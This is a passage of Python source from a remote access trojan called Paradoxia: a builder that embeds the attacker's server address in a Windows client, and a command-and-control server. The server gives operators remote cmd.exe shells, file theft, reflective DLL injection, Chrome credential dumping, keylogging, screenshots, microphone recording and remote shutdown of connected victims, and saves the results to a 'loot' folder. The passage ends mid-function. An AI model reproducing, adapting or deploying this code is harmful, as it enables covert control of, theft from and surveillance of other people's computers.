""" 6 | import os 7 | import subprocess 8 | import os 9 | import subprocess 10 | 11 | 12 | def inplace_change(filename, old_string, new_string): 13 | # Safely read the input filename using 'with' 14 | try: 15 | with open(filename) as f: 16 | s = f.read() 17 | if old_string not in s: 18 | #print('"{old_string}" not found in {filename}.'.format(**locals())) 19 | return 20 | 21 | # Safely write the changed content, if found in the file 22 | with open(filename, 'w') as f: 23 | #print('Changing "{old_string}" to "{new_string}" in {filename}'.format(**locals())) 24 | s = s.replace(old_string, new_string) 25 | f.write(s) 26 | except FileNotFoundError: 27 | print("[x] File not found : " + filename) 28 | except Exception as e: 29 | print("[X] Error : " + str(e)) 30 | 31 | 32 | def Build(host, port, icon, outfile, install_name, install_dir): 33 | try: 34 | os.chdir("ParadoxiaClient/ParadoxiaClient") 35 | 36 | inplace_change("ParadoxiaClient.c", "{{serverhost}}", host) 37 | inplace_change("ParadoxiaClient.c", "{{serverport}}", port) 38 | inplace_change("paradoxia.h", "{{installname}}", install_name.strip()) 39 | inplace_change("paradoxia.h", "{{installdir}}", install_dir.strip()) 40 | inplace_change("makefile", "{{outfilehere}}", outfile) 41 | if(icon is not None): 42 | if(os.path.isfile(icon)): 43 | inplace_change("icon.rc", "{{iconhere}}", icon) 44 | subprocess.call(["make", "icon"], stderr=subprocess.STDOUT, stdout = subprocess.DEVNULL) 45 | 46 | else: 47 | print("[X] Icon not found : " + icon) 48 | else: 49 | subprocess.call(["make"], stderr=subprocess.STDOUT, stdout = subprocess.DEVNULL) 50 | 51 | 52 | if(os.path.isfile(outfile)): 53 | print("[+] Built : {x}".format(x = os.path.abspath(outfile))) 54 | else: 55 | print("[X] Error building Paradoxia Client.") 56 | 57 | except Exception as e: 58 | print("[x] Error : " + str(e)) 59 | 60 | inplace_change("ParadoxiaClient.c", host, "{{serverhost}}") 61 | inplace_change("ParadoxiaClient.c", port, "{{serverport}}") 62 | if(icon is not None): 63 | inplace_change("icon.rc",icon, "{{iconhere}}") 64 | inplace_change("makefile", outfile, "{{outfilehere}}") 65 | inplace_change("paradoxia.h", install_name.strip(), "{{installname}}") 66 | inplace_change("paradoxia.h", install_dir.strip(), "{{installdir}}") 67 | os.chdir("..") 68 | os.chdir("..") -------------------------------------------------------------------------------- /kernel/main.py: -------------------------------------------------------------------------------- 1 | """ 2 | Core file for Paradoxia V.2 3 | Most of the code has been taken from the Maalik Framework and merged into old and bad code of paradoxia. 4 | 5 | => https://github.com/quantumcored/maalik 6 | """ 7 | 8 | """ 9 | 10 | Have a good time reading the source. You are an amazing person. 11 | 12 | """ 13 | import socket 14 | import _thread 15 | import configparser 16 | from os import stat 17 | from os import path 18 | from .builder import Build 19 | import os 20 | import subprocess 21 | from kernel.banner import pbanner 22 | from .other import * 23 | from colorama import Fore, Style 24 | import colorama 25 | from .scanner import * 26 | import tqdm 27 | import time 28 | from prompt_toolkit import prompt 29 | import sys 30 | 31 | colorama.init() 32 | 33 | clients = [] # List of client sockets 34 | oslist = [] # List of client Operating systems 35 | iplist = [] # List of Client IP addresses 36 | wan_ip_list = [] # List of Client Wan IP's 37 | blacklist = [] # List of blacklisted ip 38 | log = [] # logging messages from client 39 | hostList = [] 40 | 41 | ClientInfoList = [] 42 | 43 | isSession = False 44 | silent = False 45 | shellmode = False # ( ͡° ͜ʖ ͡°) 46 | 47 | # Do not change this 48 | DLL_OUTPUT_FILE = "proxima_centauri.txt" 49 | 50 | infodb = configparser.ConfigParser() 51 | settings = configparser.ConfigParser() 52 | 53 | 54 | try: 55 | settings.read("paradoxia.ini") 56 | server_settings = settings['server'] 57 | bot_settings = settings['bot'] 58 | except Exception as e: 59 | print(str(e)) 60 | exit(True) 61 | 62 | 63 | def broadcast(data): 64 | try: 65 | for i in clients: 66 | i.send(data.encode()) 67 | except Exception as error: 68 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error)) 69 | 70 | 71 | class ParadoxiaClient: 72 | def __init__(self, client_socket): 73 | self.client_socket = client_socket 74 | 75 | global clients 76 | global oslist 77 | global iplist 78 | global wan_ip_list 79 | global blacklist 80 | 81 | client_information = [] 82 | 83 | def Log(self, data): 84 | del log[:] 85 | log.append(data) 86 | 87 | 88 | def botlist(self): 89 | return str(len(clients)) 90 | 91 | def SendData(self, data): 92 | try: 93 | self.client_socket.send(data.encode()) 94 | except Exception as error: 95 | self._clearKick() 96 | print("Error Occured : " + str(error)) 97 | 98 | def SendBytes(self, data): 99 | try: 100 | self.client_socket.send(data) 101 | except Exception as error: 102 | self._clearKick() 103 | print("Error Occured : " + str(error)) 104 | 105 | 106 | def returnClientName(self): 107 | index = clients.index(self.client_socket) 108 | return wan_ip_list[index] + " - " + oslist[index] 109 | 110 | def _clearKick(self): 111 | ''' 112 | clear lists and kick 113 | ''' 114 | global isSession 115 | global clients 116 | try: 117 | if(isSession): 118 | print( Style.BRIGHT + Fore.RED + "[ Session Closed ] " + Style.RESET_ALL + self.returnClientName()) 119 | isSession = False 120 | location = clients.index(self.client_socket) 121 | clients.remove(clients[location]) 122 | iplist.remove(iplist[location]) 123 | oslist.remove(oslist[location]) 124 | wan_ip_list.remove(wan_ip_list[location]) 125 | ClientInfoList.remove(ClientInfoList[location]) 126 | except Exception as unkown_error: 127 | print(Style.BRIGHT + Fore.RED + "[x]" + Style.RESET_ALL + " Error : " + str(unkown_error)) 128 | 129 | def clearLog(self): 130 | del log[:] 131 | 132 | def WaitForReply(self): 133 | """ 134 | Wait 20 seconds for Message from Client 135 | """ 136 | self.clearLog() # Clear log list 137 | x = 0 # x is 0 138 | while(x != 20): # while x is not 20 139 | try: 140 | if(len(log) > 0): # If length of log is greater than 0, means message received. So break the loop 141 | break # break here 142 | time.sleep(0.5) # Sleep 0.5 second 143 | x += 1 # Add one to x 144 | if(x == 20): 145 | print( Style.BRIGHT + Fore.RED + "[i]" + Style.RESET_ALL + " 20 seconds have passed and we have received no response from Paradoxia. There may be a problem.") 146 | except KeyboardInterrupt: 147 | break # Keyboard interrupt, Breaks the loop. 148 | 149 | 150 | def returnWanIP(self): 151 | ip_index = clients.index(self.client_socket) 152 | wanip = wan_ip_list[ip_index] 153 | 154 | if(wanip.startswith("No")): 155 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Unable to get Wan IP, No internet access detected.") 156 | geolocation_information = "[No Internet Access]" 157 | else: 158 | return wan_ip_list[ip_index] 159 | 160 | def returnOS(self): 161 | ip_index = clients.index(self.client_socket) 162 | return oslist[ip_index] 163 | 164 | def getClientInformation(self): 165 | wanip = self.returnWanIP() 166 | os = self.returnOS() 167 | # print(os) 168 | self.SendData("ramsize") 169 | ram = self.client_socket.recv(1024).decode() 170 | # print(ram) 171 | self.SendData("vramsize") 172 | vram = self.client_socket.recv(1024).decode() 173 | # print(vram) 174 | self.SendData("pagesize") 175 | pagesize = self.client_socket.recv(1024).decode() 176 | # print(pagesize) 177 | self.SendData("processors") 178 | processors = self.client_socket.recv(1024).decode() 179 | # print(processors) 180 | self.SendData("minappaddr") 181 | minappaddr = self.client_socket.recv(1024).decode() 182 | # print(minappaddr) 183 | self.SendData("maxappaddr") 184 | maxappaddr = self.client_socket.recv(1024).decode() 185 | # print(maxappaddr) 186 | self.SendData("agent") 187 | agent_location = self.client_socket.recv(1024).decode() 188 | # print(agent_location) 189 | self.SendData("host") 190 | user_pc = self.client_socket.recv(1024).decode() 191 | # print(user_pc) 192 | 193 | 194 | return """ 195 | [+] Operating System : {os} 196 | [+] Ram : {ram} 197 | [+] VirtualRam : {vram} 198 | [+] MinimumApplicationAddress : {minappaddr} 199 | [+] MaximumApplicationAddress : {maxappaddr} 200 | [+] PageSize : {pagesize} 201 | [+] Processors : {processors} 202 | [+] Agent-Location : {agent_location} 203 | [+] User-PC : {userpc} 204 | [+] WAN : {wanip} 205 | """.format( 206 | os = os, 207 | ram = ram, 208 | vram = vram, 209 | minappaddr = minappaddr, 210 | maxappaddr = maxappaddr, 211 | pagesize = pagesize, 212 | processors = processors, 213 | agent_location = agent_location, 214 | userpc = user_pc, 215 | wanip = wanip, 216 | ) 217 | 218 | 219 | 220 | def Session(self): 221 | 222 | global isSession 223 | global shellmode 224 | global silent 225 | 226 | def filetransfer(mfile = None, rfile=None): 227 | if(mfile == None and rfile == None): 228 | mfile = prompt("[+] File Path : ") 229 | rfile = prompt("[+] File name to Save as : ") 230 | 231 | if(":" in rfile): 232 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ':' is forbidden in filename.") 233 | else: 234 | try: 235 | with open(mfile, "rb") as sendfile: 236 | data = sendfile.read() 237 | bufferst = os.stat(mfile) 238 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] File opened " + mfile + " ("+str(bufferst.st_size) + " bytes)" ) 239 | 240 | self.SendData("frecv") # Send File Receive trigger for client 241 | trigger = rfile + ":" + str(bufferst.st_size) 242 | time.sleep(1) 243 | self.SendData(trigger) # Send Trigger 244 | self.SendBytes(data) # Send file 245 | print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Uploading file.") 246 | self.WaitForReply() 247 | except FileNotFoundError: 248 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] '{file}' not found!?".format(file = mfile)) 249 | except Exception as e: 250 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error : " + str(e)) 251 | 252 | def DLLTransfer(mfile=None): 253 | if(mfile == None): 254 | mfile = prompt("[+] DLL Path : ") 255 | proc = prompt("[+] Process Name : ") 256 | else: 257 | proc = "None" 258 | try: 259 | with open(mfile, "rb") as sendfile: 260 | data = sendfile.read() 261 | bufferst = os.stat(mfile) 262 | #print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] File opened " + mfile + " ("+str(bufferst.st_size) + " bytes)" ) 263 | 264 | self.SendData("fdll") # Send File Receive trigger for client 265 | time.sleep(1) 266 | trigger = "paradoxia" + ":" + str(bufferst.st_size) + ":" + proc 267 | self.SendData(trigger) # Send Trigger 268 | self.SendBytes(data) # Send file 269 | #print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Uploading file.") 270 | self.WaitForReply() 271 | except FileNotFoundError: 272 | print("[X] '{file}' not found!?".format(file = mfile)) 273 | except Exception as e: 274 | print("[X] Error : " + str(e)) 275 | 276 | isSession = True 277 | while(isSession): 278 | try: 279 | try: 280 | location = clients.index(self.client_socket) 281 | if not shellmode: 282 | shellmode = True 283 | 284 | except ValueError: 285 | print("[X] Client disconnected unexpectedly, Session closed.") 286 | shellmode = False 287 | session = False 288 | break 289 | ip = iplist[location] 290 | main = prompt("paradoxia >> ({ip}) : ".format(ip = ip)) 291 | if(main == "ls"): 292 | 293 | self.SendData("listdir") 294 | self.WaitForReply() 295 | 296 | 297 | elif(main.startswith("dir")): 298 | sp = main.split() 299 | try: 300 | self.SendData("cd") 301 | self.SendData(sp[1]) 302 | self.WaitForReply() 303 | except IndexError: 304 | print(Style.BRIGHT + Fore.RED + "[X] Error : Usage is dir < dir > ") 305 | elif(main == "poweroff"): 306 | self.SendData("cmd.exe /c shutdown /s /t 0") 307 | self.WaitForReply() 308 | elif(main == "reboot"): 309 | self.SendData("cmd.exe /c shutdown /r /t 0") 310 | self.WaitForReply() 311 | elif(main == "shell"): 312 | shell = True 313 | 314 | while (shell): 315 | sh = prompt("cmd> ") 316 | if(len(sh) > 0): 317 | if(sh != "exit"): 318 | self.SendData("cmd.exe /c "+ sh) 319 | self.WaitForReply() 320 | else: 321 | shell = False 322 | break 323 | 324 | elif(main == "exit"): 325 | shellmode = False 326 | session = False 327 | break 328 | 329 | elif(main == "delete"): 330 | dlt = prompt("[:] Enter Filename to Delete : ") 331 | if(len(dlt) > 0): 332 | self.SendData("delete:"+dlt) 333 | self.WaitForReply() 334 | 335 | elif ( main == "clientinfo"): 336 | self.SendData("clientinfo") 337 | 338 | elif(main == "upload"): 339 | filetransfer() 340 | time.sleep(2) 341 | 342 | elif(main == "download"): 343 | filename = prompt("[+] File : ") 344 | if(len(filename) > 0): 345 | self.SendData("fupload:"+filename) 346 | self.WaitForReply() 347 | time.sleep(5) 348 | 349 | elif(main == "processinfo"): 350 | name = prompt("[+] Enter Process name : ") 351 | if(len(name) > 0): 352 | self.SendData("psinfo:"+name) 353 | self.WaitForReply() 354 | 355 | elif(main == "admin"): 356 | self.SendData("isadmin") 357 | self.WaitForReply() 358 | 359 | elif(main == "geolocate"): 360 | GeoLocate(self.returnWanIP()) 361 | elif(main == "dllinject"): 362 | DLLTransfer() 363 | 364 | elif(main == "drives"): 365 | self.SendData("cmd.exe /c fsutil fsinfo drives") 366 | self.WaitForReply() 367 | 368 | elif(main == "help"): 369 | print(session_help) 370 | 371 | elif (main == "kill"): 372 | self.SendData("kill") 373 | self.client_socket.shutdown(socket.SHUT_RDWR) 374 | self.client_socket.close() 375 | shellmode = False 376 | session = False 377 | break 378 | 379 | elif(main == "die"): 380 | self.SendData("die") 381 | self.WaitForReply() 382 | self.client_socket.shutdown(socket.SHUT_RDWR) 383 | self.client_socket.close() 384 | shellmode = False 385 | session = False 386 | break 387 | elif(main == "screenshot"): 388 | self.SendData("screenshot") 389 | self.WaitForReply() 390 | 391 | elif(main == "chromedump"): 392 | DLLTransfer("dlls/chrome.dll") # Inject ChromeDump.dll 393 | time.sleep(2) 394 | credfile = hostList[location].split("/")[0].strip() 395 | self.SendData("fupload:"+credfile) 396 | time.sleep(2) 397 | self.SendData("delete:"+credfile) 398 | self.WaitForReply() 399 | print("-------------------------") 400 | PrintTextFile("loot/"+credfile) 401 | print("-------------------------") 402 | print(Style.BRIGHT + Fore.LIGHTWHITE_EX + "[+] Saved in 'downloads/"+credfile+"'") 403 | 404 | elif(main == "keylog_start"): 405 | DLLTransfer("dlls/keylogger.dll") 406 | 407 | elif(main == "keylog_dump"): 408 | self.SendData("fupload:log.log") 409 | self.WaitForReply() 410 | time.sleep(2) 411 | self.SendData("delete:log.log") 412 | self.WaitForReply() 413 | print("-------------------------") 414 | PrintTextFile("loot/log.log") 415 | print("-------------------------") 416 | try: 417 | os.remove("loot/log.log") 418 | except FileNotFoundError: 419 | print("[X] No Logs were written.") 420 | 421 | elif(main == "info"): 422 | index = clients.index(self.client_socket) 423 | print(ClientInfoList[index]) 424 | 425 | elif(main == "micrecord"): 426 | saveFile = input("[+] Enter filename to save as : ") 427 | if(len(saveFile) > 0): 428 | self.SendData("micstart") 429 | self.WaitForReply() 430 | while(True): 431 | try: 432 | print("[+] Press CTRL+C to stop.") 433 | prompt("") 434 | except KeyboardInterrupt: 435 | self.SendData("micstop:"+saveFile) 436 | break 437 | time.sleep(2) 438 | self.SendData("fupload:"+saveFile) 439 | self.WaitForReply() 440 | time.sleep(2) 441 | self.SendData("delete:"+saveFile) 442 | 443 | except KeyboardInterrupt: 444 | print("[X] Interrupt, Type exit to Exit session.") 445 | 446 | 447 | def ClientThread(self): 448 | 449 | """ 450 | Receive data from client 451 | """ 452 | global silent 453 | global shellmode 454 | 455 | def uniquify(path): 456 | """ 457 | Credits : https://stackoverflow.com/questions/13852700/create-file-but-if-name-exists-add-number/57896232#57896232 458 | """ 459 | filename, extension = os.path.splitext(path) 460 | counter = 1 461 | 462 | while os.path.exists(path): 463 | path = filename + " (" + str(counter) + ")" + extension 464 | counter += 1 465 | 466 | return path 467 | 468 | while(True): 469 | try: 470 | client_data = self.client_socket.recv(1024).decode() 471 | 472 | if(not client_data): 473 | self._clearKick() 474 | break 475 | 476 | self.Log(client_data) 477 | 478 | try: 479 | indexof = clients.index(self.client_socket) 480 | ips = iplist[indexof] 481 | except Exception as e: 482 | print("[X] Error : " + str(e)) 483 | pass 484 | 485 | # Paradoxia reporting an Open Port on a Host 486 | if(client_data.startswith("OPENPORT")): 487 | # OPENPORT:IP,Port 488 | parse = client_data.split(":") 489 | ip_port = str(parse[1]).split(",") 490 | with open("common_ports", "r") as portlist: 491 | lines = portlist.readlines() 492 | for line in lines: 493 | if(ip_port[1] in line): 494 | # if port in list 495 | ipport = ip_port[0] + ":" + ip_port[1] 496 | print("["+ Style.BRIGHT + Fore.GREEN + "+" + Style.RESET_ALL + "] " + ipport + Style.BRIGHT + Fore.GREEN + " <--> " + Style.RESET_ALL + line ) 497 | if(ipport not in self.open_ports_list): 498 | self.open_ports_list.append(ipport) 499 | break 500 | 501 | 502 | # Paradoxia wants to send us a file 503 | elif(client_data.startswith("FILE")): 504 | try: 505 | fileinfo = client_data.split(":") #FILE:filename.txt:555 506 | #print(fileinfo) 507 | filename = fileinfo[1] 508 | filesize = int(fileinfo[2]) 509 | SaveFile = "loot/"+ filename 510 | FinalF = uniquify(SaveFile) 511 | 512 | with open(FinalF, "wb") as incoming_file: 513 | data = self.client_socket.recv(4096) 514 | 515 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloading file '{fl}' in '{fd}'".format(fl=filename, fd=FinalF)) 516 | while(len(data) != filesize): 517 | data += self.client_socket.recv(filesize - len(data)) 518 | #print("data = " + str(len(data)) + " filesize = " + str(filesize)) 519 | if not data: break 520 | incoming_file.write(data) 521 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloaded '{fl}' => '{fd}'".format(fl=filename, fd=FinalF)) 522 | 523 | except Exception as e: 524 | print("[X] Error : " + str(e)) 525 | print("[i] File Download Information : " + client_data) 526 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 527 | print("[i] Please report this bug to developer with the information above.") 528 | pass 529 | 530 | # Get Process information 531 | elif(client_data.startswith("PROCESS")): 532 | try: 533 | fileinfo = client_data.split(",") # split info by comma 534 | print( 535 | Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] Process '{p}' running at PID '{pid}' Path on disk '{pth}' ..." 536 | .format(p = fileinfo[1], pid = fileinfo[2], pth = fileinfo[3])) 537 | 538 | except Exception as Error: 539 | print("[X] Error : " + str(Error)) 540 | print("[i] Process Information : " + client_data) 541 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 542 | print("[i] Please report this bug to developer with the information above.") 543 | pass 544 | 545 | elif(client_data.startswith("PID")): 546 | try: 547 | fileinfo = client_data.split(":") # split info by comma 548 | self.SendData("psinfo:"+fileinfo[1]) 549 | 550 | except Exception as Error: 551 | print("[X] Error : " + str(Error)) 552 | print("[i] Process Information : " + client_data) 553 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 554 | print("[i] Please report this bug to developer with the information above.") 555 | pass 556 | elif(client_data.startswith("ADMIN")): 557 | try: 558 | fileinfo = client_data.split(":") 559 | 560 | if(fileinfo[1] == "TRUE"): 561 | elevated = True 562 | else: 563 | elevated = False 564 | 565 | if(not silent): 566 | print( 567 | Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] Administrator : " + fileinfo[1].lower()) 568 | 569 | 570 | except Exception as Error: 571 | print("[X] Error : " + str(Error)) 572 | print("[i] Process Information : " + client_data) 573 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 574 | print("[i] Please report this bug to developer with the information above.") 575 | pass 576 | 577 | # Get screenshot, Convert to png and save 578 | elif(client_data.startswith("SCREENSHOT")): 579 | try: 580 | fileinfo = client_data.split(":") #SCREENSHOT:filename.txt:555 581 | # print(fileinfo) 582 | filename = fileinfo[1] 583 | filesize = int(fileinfo[2]) 584 | SaveFile = "loot/"+ filename 585 | FinalF = uniquify(SaveFile).replace("bmp", "png") 586 | 587 | time.sleep(1) 588 | with open(FinalF, "wb") as incoming_file: 589 | data = self.client_socket.recv(4096) 590 | #print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloading file '{fl}' in '{fd}'".format(fl=filename, fd=FinalF)) 591 | while(len(data) != filesize): 592 | data += self.client_socket.recv(filesize - len(data)) 593 | #print("data = " + str(len(data)) + " filesize = " + str(filesize)) 594 | if not data: break 595 | incoming_file.write(data) 596 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Screenshot saved to '{fl}'".format(fl=FinalF)) 597 | saveAndShowImage(FinalF) 598 | 599 | except Exception as e: 600 | print("[X] Error : " + str(e)) 601 | print("[i] Screenshot Download Information : " + client_data) 602 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 603 | print("[i] Please report this bug to developer with the information above.") 604 | pass 605 | 606 | # File was recevied by Paradoxia 607 | elif(client_data.startswith("F_OK")): 608 | try: 609 | fileinfo = client_data.split(",") # split info by comma 610 | print( 611 | Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] Uploaded {filename} ({filesize} bytes) to '{remote_path}' ..." 612 | .format(filename = fileinfo[1], filesize = fileinfo[2], remote_path = fileinfo[3])) 613 | 614 | except Exception as Error: 615 | print("[X] Error : " + str(Error)) 616 | print("[i] File Received Information : " + client_data) 617 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 618 | print("[i] Please report this bug to developer with the information above.") 619 | pass 620 | 621 | # Reflective DLL Injection was successfully done 622 | elif(client_data.startswith("DLL_OK")): 623 | try: 624 | fileinfo = client_data.split(":") 625 | print(Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] Injected Reflective DLL into PID " + fileinfo[1] + " ...") 626 | 627 | except Exception as Error: 628 | print("[X] Error : " + str(Error)) 629 | print("[i] Reflective DLL Inject Information : " + client_data) 630 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 631 | print("[i] Please report this bug to developer with the information above.") 632 | pass 633 | 634 | # Get Wanip, geolocate 635 | 636 | elif(client_data.startswith("WANIP")): 637 | try: 638 | fileinfo = client_data.split(":") 639 | print(Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] WAN IP : " + fileinfo[1] + " ...") 640 | GeoLocate(fileinfo[1]) 641 | except Exception as Error: 642 | print("[X] Error : " + str(Error)) 643 | print("[i] Geolocation Information : " + client_data) 644 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 645 | print("[i] Please report this bug to developer with the information above.") 646 | pass 647 | elif(client_data.startswith("DEL_OK")): 648 | try: 649 | fileinfo = client_data.split(",") 650 | print( "[" + Fore.LIGHTGREEN_EX + Style.BRIGHT + "i" + Style.RESET_ALL + "] File '{file}' deleted from '{pth}' ..." .format(file = fileinfo[1], pth = fileinfo[2] )) 651 | 652 | except Exception as Error: 653 | print("[X] Error : " + str(Error)) 654 | print("[i] File Delete Information : " + client_data) 655 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 656 | print("[i] Please report this bug to developer with the information above.") 657 | pass 658 | elif(shellmode == True): 659 | print("\n"+client_data) # No other information 660 | 661 | elif(silent == False): 662 | print("\n["+ Style.BRIGHT + Fore.GREEN + "+" + Style.RESET_ALL + "] {ips} : ".format(ips = ips) + client_data) 663 | 664 | except Exception as e: 665 | self._clearKick() 666 | print("[X] Error : " + str(e)) 667 | break 668 | except UnicodeDecodeError as ude: 669 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Unicode Decode error : " + str(ude)) 670 | except UnicodeEncodeError as eEe: 671 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Unicode Encode error : " + str(eEe)) 672 | except ConnectionAbortedError as cAe: 673 | self._clearKick() 674 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cAe)) 675 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 676 | break 677 | 678 | except ConnectionError as cE: 679 | self._clearKick() 680 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cE)) 681 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 682 | break 683 | 684 | except ConnectionRefusedError as cRe: 685 | self._clearKick() 686 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cRe)) 687 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 688 | break 689 | 690 | except ConnectionResetError as cRetwo: 691 | self._clearKick() 692 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cRetwo)) 693 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 694 | break 695 | 696 | except socket.error as se: 697 | 698 | self._clearKick() 699 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(se)) 700 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 701 | break 702 | 703 | except Exception as recv_error: 704 | self._clearKick() 705 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(recv_error)) 706 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 707 | break 708 | 709 | def TCPServer(): 710 | global iplist 711 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) 712 | server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 713 | server.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) 714 | server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 1) 715 | server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 1) 716 | server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 5) 717 | 718 | host = server_settings['host'] 719 | port = int(server_settings['port']) 720 | 721 | blist = open("blacklist", "r") 722 | bl_ips = blist.readlines() 723 | for i in range(len(bl_ips)): 724 | if("#" in bl_ips[i]): 725 | pass 726 | else: 727 | blacklist.append(bl_ips[i]) 728 | 729 | try: 730 | server.bind((host, port)) 731 | except PermissionError: 732 | print("["+Style.BRIGHT + Fore.LIGHTYELLOW_EX + "^" + Style.RESET_ALL + "] Run as sudo.") 733 | exit(True) 734 | except Exception as i: 735 | raise i 736 | 737 | try: 738 | server.listen(5) 739 | #print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] TCP Server running. ({host}:{port})".format(host=host, port=server_settings['port'])) 740 | except KeyboardInterrupt: 741 | print(" Keyboard Interrupt, Exit.") 742 | exit() 743 | except Exception as errunknown: 744 | print(str(errunknown)) 745 | 746 | while(True): 747 | 748 | client, addr = server.accept() 749 | if(addr[0] in blacklist): 750 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] New Connection form blacklisted IP " + str(addr[0]) +":"+ str(addr[1])) 751 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Connection Closed.") 752 | client.shutdown(socket.SHUT_RDWR) 753 | client.close() 754 | break 755 | 756 | 757 | try: 758 | client.send("host".encode()) 759 | host = client.recv(1024).decode() # Receive User PC ' Test / TEST-PC '. I call this host. And all of these are saved in hostList 760 | hostList.append(host) 761 | except Exception as e: 762 | print(str(e)) 763 | break 764 | 765 | wanip = "" 766 | try: 767 | cld = ParadoxiaClient(client) 768 | clients.append(client) 769 | client_ip = str(addr[0]) +":"+ str(addr[1]) 770 | iplist.append(client_ip) 771 | client.send("wanip".encode()) 772 | wanip = client.recv(1024).decode() 773 | 774 | if(wanip.startswith("No")): 775 | wan_ip_list.append(wanip) 776 | else: 777 | wan_ip_list.append(wanip.split(":")[1]) 778 | 779 | client.send("os".encode()) 780 | os = client.recv(1024).decode() 781 | 782 | oslist.append(os) 783 | 784 | full_info = cld.getClientInformation() 785 | ClientInfoList.append(full_info) 786 | except ConnectionResetError as cRe: 787 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ERROR : " + str(cRe) + ".") 788 | clients.remove(client) 789 | iplist.remove(str(addr[0])) 790 | oslist.remove(os) 791 | except ConnectionAbortedError as cAe: 792 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ERROR : " + str(cAe) + ".") 793 | clients.remove(client) 794 | iplist.remove(str(addr[0])) 795 | oslist.remove(os) 796 | 797 | except Exception as e: 798 | print("[X] Error : " + str(e)) 799 | 800 | if(wanip.startswith(("No"))): 801 | filename = "bots/"+str(addr[0]) 802 | else: 803 | filename = "bots/"+str(wanip) 804 | if(bot_settings['verbose'] == "True"): 805 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Getting information..") 806 | notify("Paradoxia", "New Connection : " + cld.returnClientName()) 807 | # default 808 | print( Style.BRIGHT + Fore.GREEN + "\n[ Session Opened ] " + Style.RESET_ALL + cld.returnClientName()) 809 | _thread.start_new_thread(cld.ClientThread, ()) 810 | 811 | 812 | 813 | def Console(): 814 | global iplist 815 | def SendData(csocket, data): 816 | csocket = int(csocket) 817 | sockfd = clients[csocket] 818 | 819 | try: 820 | sockfd.send(data.encode()) 821 | except Exception as error: 822 | clients.remove(sockfd) 823 | print("Error Occured : " + str(error)) 824 | 825 | def list_bots(): 826 | print("\nActive Sessions (" + str(len(clients)) +")") 827 | print("===================================") 828 | try: 829 | if(len(clients) > 0): 830 | for i in range(len(iplist)): 831 | print( 832 | 